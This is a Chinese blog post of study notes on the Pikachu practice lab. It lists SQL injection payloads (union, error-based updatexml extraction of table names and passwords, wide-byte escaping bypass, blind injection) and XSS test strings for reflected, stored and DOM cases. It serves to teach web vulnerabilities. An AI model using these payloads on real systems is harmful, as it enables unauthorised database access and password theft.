漏洞02-SQL注入_select uid from manager where uemail='$emailuserna-CSDN博客

本文链接：https://blog.csdn.net/weixin_44406011/article/details/135966130

本文详细探讨了SQL注入的各种形式，包括直接注入、报错注入利用、通过字符串操作进行的宽字节注入，以及SQL盲注和XSS跨站脚本漏洞的类型，强调了防范措施的重要性。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

SQL注入

文章目录

SQL注入

$query="select id,email from member where username='$name'";

$query="select id,email from member where username='vince'";

$query="select id,email from member where username='xx'";

$query="select id,email from member where username='xx' or 1=1#'";

$query="select id,email from member where username='xx' union select username,password from users#'";

#、--   注释的意思

$query="select username,email from member where id=$id";

$query="select username,email from member where id=1";

$query="select username,email from member where id=1 or 1=1#";

$query="select username,email from member where id=1 and 1=1#";

$query="select username,email from member where id=1 and 1=2#";

$query="select username,email from member where id=1 union select username,password from users";




$query="select username,id,email from member where username like '%$name%'";

$query="select username,id,email from member where username like '%xx%’ or 1=1#%'";	
	
	

报错注入：[mysql数据库中存在一个information_schema的默认数据库，这个库里面记录着整个mysql管理的数据库的名称、表名、字段名]
x' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#       报数据库版本信息 0x7e 16进制
x' and updatexml(1,concat(0x7e,(select user()),0x7e),1)#          报数据库当前用户
x' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#      报数据库


x' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0)#
报表名---

x' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' and table_schema='pikachu' limit 0,1)),0)#
报字段名

x' and updatexml(1,concat(0x7e,(select password from users limit 0,1)),0)#
报字段内容
	



增删改：页面没有回显信息
insert
$query="insert into member(username,pw,sex,phonenum,email,address) values('{$getdata['username']}',md5('{$getdata['password']}'),'{$getdata['sex']}','{$getdata['phonenum']}','{$getdata['email']}','{$getdata['add']}')";
x' and updatexml(1,concat(0x7e,(select password from users limit 0,1)),0) or'
使用报错注入的形式

update
x' and updatexml(1,concat(0x7e,(select password from users limit 0,1)),0) or'
使用报错注入的形式

delete
使用报错注入的形式
 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0)#











	
宽字节注入：（开发加了转义）	
转义函数把字符如：‘、“、等自动在前面加上\，让这些符号的意义失效，或注释掉
$query="select id,email from member where username='xx\' or 1=1#'";
$query="select id,email from member where username='xx%df' or 1=1#'";
xx\' or 1=1#     xx%5C%27+or+1%3D1%23
                 xx%df%5C%27+or+1%3D1%23


SQL盲注
$query="select id,email from member where username='vince'";
$query="select id,email from member where username='vince' and ascii(substr(database(),1,1))=112#'";




XSS跨站脚本漏洞

试探：'"<>123456

<script>alert("xss")</script>

存储型：每次刷新都会弹出，持久性伤害，所有访问该页面的用户都会中招



DOM型：
<a href='"+str+"'>what do you see?</a>
' οnclick="alert('xss')">
<a href='' οnclick="alert('xss')">'>what do you see?</a>



<a href='"+xss+"'>就让往事都随风,都随风吧</a>